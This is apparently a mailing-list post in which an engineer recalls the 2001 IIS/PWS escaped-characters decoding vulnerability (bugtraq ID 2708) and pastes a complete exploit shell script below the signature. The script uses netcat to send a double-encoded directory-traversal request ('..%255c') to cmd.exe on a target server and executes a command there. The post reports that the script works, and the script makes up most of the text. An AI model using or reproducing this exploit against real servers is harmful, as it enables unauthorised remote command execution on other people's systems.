I'm not sure if you remember this exploit from back in May, but essentially,
using a UNIX box you can obtain a remote console on an effected Win2K box.
Without reading the script again or spending too many brain cycles on
remembering the details I believe the exploit does *NOT* require having
RConsole or Terminal services installed on the victim.

The Exploit has bugtraq ID 2708 and is titled "MS IIS/PWS Escaped Characters
Decoding Command Execution Vulnerability". A gentleman by the name of "Leif
Jakob <bugtraqjakob.weite-welt.com> has provided the 'IIS_escape_test.sh'
exploit." I've pasted my copy of the script below my sig.

We never experienced this attack in the wild, however we did use the exploit
in a test environment to confirm it. It works. Rather nicely, actually.

Hope that helps.

Sam Wilson
Software Engineer
swilsonecount.com

---------------------
#!/bin/sh

# Copyright 2001 by Leif Jakob <bugtraqjakob.weite-welt.com>
#
# do not abuse this code... blah blah :)

if [ -z "$1" ] ; then
    echo "usage:"
    echo "$0 hostname"
    exit 1
fi

host="$1"

NETCAT=`which netcat`

if [ -z "$NETCAT" ] ; then
    NETCAT=`which nc`
fi

if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then
    echo "you need netcat to make this work"
    exit 1
fi

echo "using netcat:$NETCAT"

function makeRequest
{
    host="$1"
    count=$2
    cmd="$3"
    echo -n 'GET /scripts/'
    while [ $count -gt 0 ] ; do
        echo -n '..%255c'
        count=$((count-1))
    done
    echo -n 'winnt/system32/cmd.exe?/c+'
    echo -n "$cmd"
    echo ' HTTP/1.0'
    echo "Host: $host"
    echo ''
    echo 'dummy'
}

function testHost
{
    host="$1"
    count=10 # you can't overdo it
    cmd='dir+c:\'
    makeRequest "$host" "$count" "$cmd" | netcat -w 4 $host 80
}

testHost "$host"

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]